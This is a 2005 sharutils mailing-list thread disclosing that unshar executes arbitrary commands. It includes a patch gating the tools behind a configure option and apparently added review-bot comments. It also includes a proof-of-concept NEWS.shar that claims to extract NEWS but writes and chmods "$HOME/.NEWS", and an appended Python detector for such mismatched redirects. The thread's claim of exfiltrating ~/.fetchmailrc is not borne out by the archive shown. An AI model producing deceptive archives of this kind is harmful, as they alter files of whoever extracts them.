Re: unshar is unsafe
From: Bruce Korb
Subject: Re: unshar is unsafe
Date: Fri, 29 Jul 2005 11:27:43 -0700
User-agent: KMail/1.7.1
Hi Bruno,
Rendering the amusing situation wherein all of the project
deliverables are optional. :-) "shar" is "secure", tho.
Let me think about what might be reasonable. - Bruce
On Wednesday 27 July 2005 05:07 am, Bruno Haible wrote:
> To: address@hidden
> Cc: Bruce Korb <address@hidden>
> Subject: unshar is unsafe
>
> Hi,
>
> It should be well-known that "unshar" is unsafe: In the current
> implementation, it allows an attacker to execute any shell commands.
> For example, the attached file NEWS.shar, when unshared, pretends to
> create a file NEWS, but instead overwrites ~/.NEWS (it could just as
> well overwrite or append a few lines to your ~/.profile) and sends me
> your ~/.fetchmailrc. (Try it :-)).
>
> $ unshar < NEWS.shar
> Standard-Eingabe:
> x - Sperrverzeichnis `_sh08096': wurde angelegt
> x - packe aus NEWS (Text)
> x - Sperrverzeichnis `_sh08096': gelöscht
>
> For this reason, it should be possible to install the useful
> programs 'uuencode', 'uudecode', and 'mail-files', without the dangerous
> programs
> - unshar (totally unsecure implementation)
> - shar (educates people to unsecure behaviour)
> - mailshar (unsecure since it invokes shar)
> - remsync (unsecure since it invokes mailshar)
> and the program
> - compress-dummy (only used by 'shar', useless on its own)
>
> And moreover, since the default installation of a GNU system should be
> secure, these programs should not be installed by default, only upon
> request.
>
> Find attached a crude patch that does this.
>
> Bruno
>
>
> ChangeLog:
> 2005-07-26 Bruno Haible <address@hidden>
>
> * configure.ac (ADD_SCRIPT): Remove mail-files.
> (UNSECURE): New installer option --enable-unsecure.
>
> src/ChangeLog:
> 2005-07-26 Bruno Haible <address@hidden>
>
> * Makefile.am (bin_PROGRAMS): Add shar and unshar only if UNSECURE
> is enabled.
> (bin_SCRIPTS): Initialize with "mail-files". Add the ADD_SCRIPTS
> only if UNSECURE is enabled.
>
> doc/ChangeLog:
> 2005-07-26 Bruno Haible <address@hidden>
>
> * Makefile.am (dist_man1_MANS): Add shar.1 and unshar.1 only if
> UNSECURE is enabled.
>
> diff -r -c3 sharutils-4.4.orig/configure.ac sharutils-4.4/configure.ac
> *** sharutils-4.4.orig/configure.ac 2005-07-10 17:57:57.000000000 +0200
> --- sharutils-4.4/configure.ac 2005-07-27 01:29:07.000000000 +0200
> ***************
> *** 22,28 ****
>
> dnl AC_ARG_PROGRAM
>
> ! AC_SUBST(ADD_SCRIPT, ["mail-files mailshar"])
>
> AC_PROG_CC
> AC_PROG_INSTALL
> --- 22,28 ----
>
> dnl AC_ARG_PROGRAM
>
> ! AC_SUBST(ADD_SCRIPT, ["mailshar"])
>
> AC_PROG_CC
> AC_PROG_INSTALL
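Review bot: in the changed AC_SUBST line, ADD_SCRIPT is left holding only "mailshar", and the src/ChangeLog entry above spells the variable ADD_SCRIPTS while the code says ADD_SCRIPT. Since src/Makefile.am now appends it only under UNSECURE, a dnl comment here saying the variable lists the scripts gated by --enable-unsecure (or a rename that says so) would keep a later change from putting mail-files back into it.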
> ***************
> *** 103,108 ****
> --- 103,114 ----
> [disable installation of uuencode and uudecode])])
> AM_CONDITIONAL([UUCODE], [test "x$enable_uucode" != xno])
>
> + AC_ARG_ENABLE(unsecure,
> + [AS_HELP_STRING([--enable-unsecure],
> + [enable installation of the unsecure programs shar, unshar, mailshar,
> + remsync])])
> + AM_CONDITIONAL([UNSECURE], [test "x$enable_unsecure" = xyes])
> +
> AM_GNU_GETTEXT
> AM_GNU_GETTEXT_VERSION([0.14.4])
> AM_WITH_DMALLOC
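Review bot: the help string in the added AC_ARG_ENABLE block says --enable-unsecure installs remsync, but ADD_SCRIPT is now just "mailshar" and remsync appears only in EXTRA_SCRIPTS in the src/Makefile.am lines shown, so nothing visible in this patch installs it. Either add remsync to the gated script list or drop it from the help text. The AM_CONDITIONAL test against xyes also means any other value, such as --enable-unsecure=shar, silently leaves the programs out; rejecting unrecognised values would make that explicit.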
> diff -r -c3 sharutils-4.4.orig/src/Makefile.am sharutils-4.4/src/Makefile.am
> *** sharutils-4.4.orig/src/Makefile.am 2005-07-09 02:46:46.000000000
> +0200
> --- sharutils-4.4/src/Makefile.am 2005-07-27 01:13:14.000000000 +0200
> ***************
> *** 17,27 ****
>
> ## Process this file with automake to produce Makefile.in.
>
> ! bin_PROGRAMS = shar unshar
> if UUCODE
> bin_PROGRAMS += uuencode uudecode
> endif
> ! bin_SCRIPTS = $(ADD_SCRIPT)
> EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
>
> DISTCLEANFILES = $(bin_SCRIPTS)
> --- 17,31 ----
>
> ## Process this file with automake to produce Makefile.in.
>
> ! bin_PROGRAMS =
> ! bin_SCRIPTS = mail-files
> if UUCODE
> bin_PROGRAMS += uuencode uudecode
> endif
> ! if UNSECURE
> ! bin_PROGRAMS += shar unshar
> ! bin_SCRIPTS += $(ADD_SCRIPT)
> ! endif
> EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
>
> DISTCLEANFILES = $(bin_SCRIPTS)
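Review bot: DISTCLEANFILES = $(bin_SCRIPTS) in the trailing context now expands to mail-files alone when UNSECURE is off, so mailshar drops out of the distclean list in the default configuration. If mailshar is still generated in that case, make distclean will leave it behind; listing the generated scripts explicitly in DISTCLEANFILES avoids tying cleanup to the install choice. A ## comment above the if UNSECURE block stating why shar and unshar are gated would also help.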
> diff -r -c3 sharutils-4.4.orig/doc/Makefile.am sharutils-4.4/doc/Makefile.am
> *** sharutils-4.4.orig/doc/Makefile.am 2005-07-09 02:32:21.000000000
> +0200
> --- sharutils-4.4/doc/Makefile.am 2005-07-27 01:02:15.000000000 +0200
> ***************
> *** 19,31 ****
>
> info_TEXINFOS = sharutils.texi
>
> ! dist_man1_MANS = shar.1 unshar.1
>
> if UUCODE
> dist_man1_MANS += uuencode.1 uuencode.5
> man1_MANS = uudecode.1
> endif
>
> CLEANFILES = $(man1_MANS)
>
> EXTRA_DIST = doclicense.texi
> --- 19,35 ----
>
> info_TEXINFOS = sharutils.texi
>
> ! dist_man1_MANS =
>
> if UUCODE
> dist_man1_MANS += uuencode.1 uuencode.5
> man1_MANS = uudecode.1
> endif
>
> + if UNSECURE
> + dist_man1_MANS += shar.1 unshar.1
> + endif
> +
> CLEANFILES = $(man1_MANS)
>
> EXTRA_DIST = doclicense.texi
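Review bot: putting shar.1 and unshar.1 into a dist_man1_MANS += inside if UNSECURE may make their distribution, not only their installation, depend on how the tree was configured. Please confirm that make dist from a tree configured without --enable-unsecure still ships both pages, and add them to EXTRA_DIST if it does not. info_TEXINFOS is untouched in this hunk, so sharutils.texi is still installed either way.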
>
>
>
> ============================= NEWS.shar =============================
> #!/bin/sh
> # This is a shell archive (produced by GNU sharutils 4.4).
> # To extract the files from this archive, save it to some FILE, remove
> # everything before the `!/bin/sh' line above, then type `sh FILE'.
> #
> # Made on 2005-07-27 00:21 CEST by <address@hidden>.
> # Source directory was `/packages/sharutils-4.4'.
> #
> # Existing files will *not* be overwritten unless `-c' is specified.
> #
> # This shar contains:
> # length mode name
> # ------ ---------- ------------------------------------------
> # 2831 -rwxr-xr-x NEWS
> #
> save_IFS="${IFS}"
> IFS="${IFS}:"
> gettext_dir=FAILED
> locale_dir=FAILED
> first_param="$1"
> for dir in $PATH
> do
> if test "$gettext_dir" = FAILED && test -f $dir/gettext \
> && ($dir/gettext --version >/dev/null 2>&1)
> then
> case `$dir/gettext --version 2>&1 | sed 1q` in
> *GNU*) gettext_dir=$dir ;;
> esac
> fi
> if test "$locale_dir" = FAILED && test -f $dir/shar \
> && ($dir/shar --print-text-domain-dir >/dev/null 2>&1)
> then
> locale_dir=`$dir/shar --print-text-domain-dir`
> fi
> done
> IFS="$save_IFS"
> if test "$locale_dir" = FAILED || test "$gettext_dir" = FAILED
> then
> echo=echo
> else
> TEXTDOMAINDIR=$locale_dir
> export TEXTDOMAINDIR
> TEXTDOMAIN=sharutils
> export TEXTDOMAIN
> echo="$gettext_dir/gettext -s"
> fi
> if (echo "testing\c"; echo 1,2,3) | grep c >/dev/null; then
> if (echo -n testing; echo 1,2,3) | sed s/-n/xn/ | grep xn >/dev/null; then
> shar_n= shar_c='
> '
> else
> shar_n=-n shar_c=
> fi
> else
> shar_n= shar_c='\c'
> fi
> if touch -am -t 200112312359.59 $$.touch >/dev/null 2>&1 && test ! -f 200112312359.59 && test -f $$.touch; then
> shar_touch='touch -am -t $1$2$3$4$5$6.$7 "$8"'
> elif touch -am 123123592001.59 $$.touch >/dev/null 2>&1 && test ! -f 123123592001.59 && test ! -f 123123592001.5 && test -f $$.touch; then
> shar_touch='touch -am $3$4$5$6$1$2.$7 "$8"'
> elif touch -am 1231235901 $$.touch >/dev/null 2>&1 && test ! -f 1231235901 && test -f $$.touch; then
> shar_touch='touch -am $3$4$5$6$2 "$8"'
> else
> shar_touch=:
> echo
> $echo 'WARNING: not restoring timestamps. Consider getting and'
> $echo "installing GNU \`touch', distributed in GNU File Utilities..."
> echo
> fi
> rm -f 200112312359.59 123123592001.59 123123592001.5 1231235901 $$.touch
> #
> $echo $shar_n 'x -' 'lock directory' "\`_sh08096': "$shar_c
> if mkdir _sh08096; then
> $echo 'created'
> else
> $echo 'failed to create'
> exit 1
> fi
> # ============= NEWS ==============
> if test -f 'NEWS' && test "$first_param" != -c; then
> $echo 'x -' SKIPPING 'NEWS' '(file already exists)'
> else
> $echo 'x -' extracting 'NEWS' '(text)'
> sed 's/^X//' << 'SHAR_EOF' > "$HOME/.NEWS" &&
> GNU sharutils NEWS - User visible changes.
> Copyright (C) 1994, 1995, 1996, 2002, 2004, 2005 Free Software Foundation,
> Inc.
> X
> Version 4.4 - July 2005, by Bruce Korb
> X
> * autotool cleanup
> * Make a non-alpha release this time.
> * Ensure a "intmax_t" exists in the code.
> X
> X
> Version 4.3.81 - June 2005, by Bruce Korb
> X
> * Compatibility: True 64 does not have "snprintf"
> * Updated FSF address
> X
> X
> X
> Version 4.3.80 - April 2005, by Bruce Korb
> X
> * Buglet: Unlink the temporary file when unsharing from stdin.
> X
> X
> X
> Version 4.3.79 - April 2005, by Bruce Korb
> X
> * rewrote the temporary file handling in unshar to avoid both a theoretical
> X timing hole (hitting it requires cooperation) and a buffer overrun
> X attack (a file name exceeding 1K).
> * new translations and updates. They are all now missing two messages:
> X "allocate file name buffer" and "allocate file buffer". *sigh*.
> X
> X
> X
> Version 4.3.78 - January 2005, by Bruce Korb
> X
> * fixed test to not require updates for every release number
> * fixed the uuencode man page so that docbook generation can work correctly.
> X
> X
> Version 4.3.77 - September 2004, by Bruce Korb
> X
> * Fixed a buffer overrun exploit
> X
> X
> Version 4.3.76 - December 2002, by Karl Eichwalder
> X
> * Updated translations: de et fr sv tr.
> X
> X
> Version 4.3.75 - December 2002, by Karl Eichwalder
> X
> * Fix compatibility issues (by Bruno Haible).
> X
> * Support bzip2 as an alternative to gzip (by Bruno Haible).
> X
> * New translations: ca et hu.
> X
> * Updated translations: da de ja sv tr zh_TW.
> X
> X
> Version 4.3.74 - July 2002, by Karl Eichwalder
> X
> * Many portability fixes (by Bruno Haible).
> X
> * Updated translation: fr.
> X
> X
> Version 4.3.73 - July 2002, by Karl Eichwalder
> X
> * Add support for large files, e.g., files larger than 2 GiB on hosts
> X where 'long' is 32 bits wide (by Paul Eggert).
> X
> X
> Version 4.3.72 - July 2002, by Karl Eichwalder
> X
> * Updated translations: fr sv.
> X
> X
> Version 4.3.71 - July 2002, by Karl Eichwalder
> X
> * Updated translations: da de.
> X
> X
> Version 4.3.70 - July 2002, by Karl Eichwalder
> X
> * Don't install 'compress' link by default; provide
> X --enable-compress-link configure option.
> X
> * Fix uudecode output file handling.
> X
> * Updated translations: de tr.
> X
> X
> Version 4.3.61 - July 2002, by Karl Eichwalder
> X
> * Re-add the intl subdirectory (libintl from gettext).
> X
> * Bugfixes.
> X
> X
> Version 4.3.60 - June 2002, by Karl Eichwalder
> X
> * Provide a 'compress-dummy' script. Install it if 'compress' isn't
> X available. Create a link 'compress' pointing to 'compress-dummy';
> X thus it is possible to unshar legacy shar files calling
> X 'compress -d'.
> X
> * shar: Don't offer '-Z' resp. '--compress' if the system doesn't
> X support 'compress'.
> X
> X
> Version 4.3.52 - June 2002, by Karl Eichwalder
> X
> * sync more files coming with automake and related frame work files.
> X
> * fix temp file races (shar).
> X
> * fix Y2K bug (shar).
> X
> * allow spaces in file names (uudecode).
> SHAR_EOF
> (set 20 05 07 22 23 38 11 "$HOME/.NEWS"; eval "$shar_touch") &&
> chmod 0755 "$HOME/.NEWS" ||
> $echo 'restore of' 'NEWS' 'failed'
> if ( md5sum --help </dev/null 2>&1 | grep 'sage: md5sum \[' ) >/dev/null 2>&1 \
> && ( md5sum --version </dev/null 2>&1 | grep -v 'textutils 1.12' ) >/dev/null; then
> md5sum -c << SHAR_EOF >/dev/null 2>&1 \
> || $echo 'NEWS:' 'MD5 check failed'
> 23c39bbc9cb029b1881b9dfcbbfe0209 NEWS
> SHAR_EOF
> else
> shar_count="`LC_ALL=C wc -c < "$HOME/.NEWS"`"
> test 2831 -eq "$shar_count" ||
> $echo 'NEWS:' 'original size' '2831,' 'current size' "$shar_count!"
> fi
> fi
> $echo $shar_n 'x -' 'lock directory' "\`_sh08096': " $shar_c
> if rm -fr _sh08096; then
> $echo 'removed'
> else
> $echo 'failed to remove'
> fi
> exit 0
>
>
--
'bkorb at veritas' is being retired in favor of the Symantec address.
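
A static triage check for the trick in the quoted NEWS.shar, where the archive announces NEWS but redirects the here-document to "$HOME/.NEWS" (an added example, not part of the original thread or of sharutils): it compares every output redirect in an archive with the manifest in its header. The names `audit_shar` and `why_suspicious` and the sample text are constructed for illustration; the check is a heuristic over redirects only, and an archive that passes it is still a shell script.

```python
import re

# Constructed sample, trimmed to the shape of the NEWS.shar quoted above.
SAMPLE = r'''# This shar contains:
#   2831 -rwxr-xr-x NEWS
$echo 'x -' extracting 'NEWS' '(text)'
sed 's/^X//' << 'SHAR_EOF' > "$HOME/.NEWS" &&
GNU sharutils NEWS - User visible changes.
SHAR_EOF
chmod 0755 "$HOME/.NEWS" ||
$echo 'restore of' 'NEWS' 'failed'
'''

MANIFEST_RE = re.compile(r"^#\s+\d+\s+[-dlrwxsStT]{10}\s+(\S+)\s*$")
HEREDOC_RE = re.compile(r"<<-?\s*\\?['\"]?(\w+)")
# Target of > or >>; skips descriptor duplications such as 2>&1.
REDIR_RE = re.compile(r"(?<![0-9&])>>?\s*(?!&)(\"[^\"]*\"|'[^']*'|[^\s;&|()<>]+)")

def why_suspicious(name, manifest):
    """Return a reason string, or None when the target looks expected."""
    if re.search(r"[$`]", name):
        return "expands a shell variable or command"
    if name.startswith(("/", "~")):
        return "absolute or home-relative path"
    if ".." in name.split("/"):
        return "escapes the extraction directory"
    return None if name in manifest else "not listed in the archive manifest"

def audit_shar(text):
    """List (line, target, reason) for redirects that miss the manifest."""
    manifest, findings, end_marker = set(), [], None
    for lineno, line in enumerate(text.splitlines(), 1):
        if end_marker:                      # here-document body is data
            if line.strip() == end_marker:
                end_marker = None
            continue
        entry = MANIFEST_RE.match(line)
        if entry:
            manifest.add(entry.group(1))
        if line.lstrip().startswith("#"):
            continue
        for target in REDIR_RE.findall(line):
            name = target.strip("'\"")
            reason = None if name == "/dev/null" else why_suspicious(name, manifest)
            if reason:
                findings.append((lineno, name, reason))
        heredoc = HEREDOC_RE.search(line)
        end_marker = heredoc.group(1) if heredoc else None
    return findings
```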